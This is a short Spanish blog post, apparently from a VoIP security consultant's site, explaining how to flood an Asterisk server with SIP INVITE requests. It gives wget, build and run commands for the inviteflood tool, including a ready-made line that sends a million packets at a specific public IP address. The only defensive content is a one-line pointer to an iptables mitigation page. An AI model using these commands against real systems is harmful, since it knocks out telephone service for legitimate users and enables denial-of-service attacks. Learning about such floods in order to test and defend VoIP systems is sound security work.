Ataques sip inviteflood a un Asterisk

En realidad este no es un concepto nuevo, siempre ha existido y mas por la deficiencia del protocolo sip que por el tipo de plataforma. El método consiste en explotar una vulnerabilidad del protocolo SIP , haciendo un envio masivo de peticiones INVITE de esta forma :

Instalación de la herramienta inviteflood

#wget http://www.hackingvoip.com/tools/inviteflood.tar.gz
#tar xvfz
inviteflood.tar.gz
#cd
inviteflood
#make

Enviar paquetes
# ./inviteflood eth0 5104 192.168.0.2 184.106.134.177 1000000 -a hacker -D 5071 -v

interfase de envío : eth0
Extension enviada : 5104
Ip origen : 192.168.0.2
Ip destino : 184.106.134.177
Cantidad de paquetes enviados : 1000000
User Alias : hacker
– D : puerto de destino
-v : Nivel de verbosidad

Hacia Asterisk. El comportamiento seria de esta forma :

sipinviteEsto causa una denegación de servicio hacia los sip client validos , lo cual es sumamente peligroso

Que hacer para contrarrestar este tipo de ataque ? , hay muchas técnicas , sin embargo la mas efectiva es usando iptables :

http://etel.wiki.oreilly.com/wiki/index.php/SIP_DoS/DDoS_Mitigation

Anuncios
Esta entrada fue publicada en Manuales y tutoriales por jroliva. Guarda el enlace permanente.

Acerca de jroliva

Juan Oliva, es un consultor de seguridad informática y telefonía IP con 10 años de experiencia en el campo . Muy involucrado en proyectos de pruebas de penetración , análisis y explotación vulnerabilidades, pruebas de ingeniería social, seguridad física, revisión de código, entre otras tareas de seguridad informática. Así mismo, desarrolla proyectos de implementación y mantenimiento de VoIP, basadas en Asterisk y Elastix, proyectos de callcenter, soluciones en la nube y hosted PBX, Aseguramiento de plataformas Linux, Windows. Ha estado trabajando para una variedad de empresas en donde ha desarrollado proyectos para el estado peruano, así como para entidades privadas, nacionales y del extranjero, cuenta con certificaciones vigentes en Ethical hacking, Linux y telefonía IP. Es instructor de cursos de Ethical Hacking y certificaciónes como Linux Professional Institute y Elastix, donde ha tenido oportunidad de realizar capacitaciones en el Perú, así como en el extranjero. Es investigador de vulnerabilidades, y creador de contenidos, que son publicados en su blog personal jroliva.wordpress.com el cual mantiene desde hace mas de 6 años.

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s